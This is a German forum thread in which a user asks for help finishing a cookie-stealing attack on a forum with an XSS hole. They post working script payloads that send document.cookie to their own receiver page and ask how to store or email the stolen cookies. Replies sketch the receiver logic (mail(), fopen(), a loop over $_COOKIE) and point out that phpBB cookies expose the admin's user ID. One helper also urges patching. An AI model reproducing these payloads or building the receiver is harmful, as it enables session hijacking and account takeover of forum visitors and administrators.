|
|||
Cookie auslesen + speichern
Hallo,
Hab ein Problem, ich hoffe hier kann mir geholfen werden Code:
<?php if(isset($_GET['cookie'])) { setcookie("setcookie2", $_GET['cookie']); } else { echo "cookie nicht gesetzt"; } ?> Außerdem wohin speichert er das cookie dann, ins root verzeichniss vom webspace? Und wie kann ich es machen das er den cookie an eine email verschickt? Ich danke im Voraus Mfg Ryan Tyla |
Sponsored Links |
Sponsored Links |
|
|||
Hey,
Ich und ein Kollege von mir betreiben einen Forum, mir ist ein Bug in diesem bekannt geworden und möchte das gerne testen. <script>document.location= ’http://myweb/empfang.php?cookie=’+document.cookie</script> Dieses script soll Cookie an die empfang.php senden. Nun möchte ich das empfang.php haben der diesen cookie aufnimmt und speichert bzw per Email weiterleitet. Hoffe jetzt ist es deutlich geworden, und ihr könnt mir helfen. PS: Ich möchte noch dazu sagen das ich im java und php Bereich nicht viel Ahnung habe. |
|
||||
Ok, dann sag doch erst mal, was an deinem ersten Code nicht funktioniert? Kommt eine Fehlermeldung oder wird der Cookie nicht gesetzt oder ...?
Wenn du eine E-Mail versenden willst, musst du natürlich auch den entsprechenden Befehl mail() dafür verwenden. Wenn du den Inhalt von $_GET['cookie'] speichern willst, sind fopen(), fwrite() und Co. deine Freunde. Ansonsten schreib bitte noch mal etwas genauer, was das eigentlich bringen soll. Ich vermute mal es geht darum, dass man in dem Forum JavaScript posten kann und damit Cookies der Betrachter auslesen kann. Das darf natürlich in keinem Forum funktionieren. Mario |
|
|||
Hey,
Ich kann leider kein PHP, deswegen fällt mir das alles so schwer. Wie du es schon gesagt hat, in dem Forum ist ein XSS BUG drine, man kann es ausnutzen um z.b an Cookie ranzukommen. Und das möchte ich austesten. a.php?lala="><script type="text/javascript">alert('Test'</script> Ist ein einfaches alert und das funktioniert. Nun möchte ich halt das ich mit dem script cookie an die empfang PHP verschicken: "><script type="text/javascript">document.location='http://mypage.de/empfang.php?cookie='+document.cookie;</script> Das Problem ist auf dem Server speichert er das Cookie nicht, also ist es auf dem Server nicht möglich das zu sehen was der script geschickt hat. Genau, ich möchte gerne das er das speichert oder per email verschickt. Kannst du mir dabei helfen? |
|
||||
Schreib in dein PHP-Script einfach folgendes rein:
PHP-Code:
Davon abgesehen wird es doch aber bestimmt einen Patch für dein Forum geben. vB, phpBB und wie sie alle heißen hatte wohl schon alle mal einen solchen Bug, der aber zum Glück meist schnell behoben wurde. Mario |
|
|||
Zitat:
Der Bug besteht auch weiterhin, weil die Programmierer von phpbb nicht nur die session_id() dort abgespeichert haben, sondern ua auch die userID des Forums.. btw: user No 2 ist fast immer der Admin. *kopfschüttel* auf phpBB will man davon aber nichts hören. Die stellen auf taub. @Memoli: hast du es nun geschafft den Inhalt des Cookies per Mail zu schicken? Wenn nicht, dann melde dich nochmal, dann kann ich dir sagen, wie du die Daten verschickt bekommst. |
|
|||
warum soll man kein JS posten können?
es wird dann angezeigt, aber nicht ausgeführt. Ich will dir das wohl gerne machen - sind ja nur ein paar Zeilen, aber wenn, dann will ich das auch eben getestet haben... (fehlt mir gerade an der Zeit) im Prinzip mit foreach die Variable $_COOKIE durchgehen und die Werte an eine weitere Variable anhängen. Dann die Variable per mail schicken... |
Sponsored Links |
Themen-Optionen | |
Ansicht | |
|
|
Ähnliche Themen | ||||
Thema | Autor | Forum | Antworten | Letzter Beitrag |
Problem bei Cookie setzen mit Jquery | ha-bauer | Javascript & Ajax | 0 | 19.11.2011 16:23 |
Datum und Uhrzeit in MySQL speichern | andre-ne | Serveradministration und serverseitige Scripte | 3 | 29.04.2011 11:45 |
Funktion togglen und als Cookie speichern? | sepp88 | Javascript & Ajax | 4 | 24.02.2010 17:36 |
Cookie lesen, zu kompliziert! | cavebird | Serveradministration und serverseitige Scripte | 14 | 01.12.2009 13:25 |
SESSION / COOKIE - Konflikte | poppihasi | Serveradministration und serverseitige Scripte | 1 | 23.12.2007 14:29 |